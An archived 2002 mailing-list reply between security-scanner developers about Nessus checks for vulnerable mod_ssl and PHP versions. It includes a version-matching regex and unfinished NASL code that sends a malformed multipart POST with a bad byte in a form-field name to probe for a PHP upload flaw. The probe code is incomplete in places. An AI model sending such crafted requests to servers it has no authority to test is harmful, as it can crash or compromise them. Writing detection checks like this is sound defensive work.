Re: mod_php / mod_ssl plugin code

From: H D Moore (hdmat_private)
Date: Wed Mar 06 2002 - 01:13:35 PST

  • Next message: Noam Rathaus: "Same file different filename"

    On Wednesday 06 March 2002 02:24 am, Renaud Deraison wrote:
    > That one was already written by Thomas Reinke (see the plugins page for
    > info). I'd be interested in actually testing for the flaw, that'd be
    > better and more reliable (my servers have ServerToken = ProductOnly, so
    > they would not be tested).
    Cool, didnt see it, I usually just check the CVS tree.
    > >     if( egrep(pattern:"(.*mod_ssl/[1-2].[0-8].[0-6])",string:banner))
    > Seems wrong to me. It will match on version 1.1.6 but not on 1.9.7.
    > I think the following would be better :
    > 	.*mod_ssl/((1..*)|(2\.([0-7]\.[0-9]*)|(8\.[0-6]))).*
    Much better, I knew I sucked at regular expressions. Heres some code to work 
    with, I will try to finish it up later. The two sticking points are finding a 
    php page and how long to wait for a response before determining the server is 
    php_page = "/index.php";
    boundary1 = string("-NESSUS!");
    boundary2 = string("--NESSUS!");
    clen = "567";
    dblq = raw_string(0x22);
    badb = raw_string(0x12);
    postdata = string("POST /", php_page, " HTTP/1.0\n");
    postdata = string(postdata, "Referer: http://", get_host_name(), "/", 
    php_page, "\n");
    postdata = string(postdata, "Content-type: multipart/form-data; boundary=", 
    boundary1, "\n");
    postdata = string(postdata, "Content-Length: ", clen, "\n\n", boundary2, 
    postdata = string(postdata, "Content-Disposition: form-data; name=");
    postdata = string(postdata, dblq, badb, dblq);
    port = 80;
    soc = open_sock_tcp(port);
    send(socket:soc, data:postdata);
    r = recv(socket:soc, length:512);

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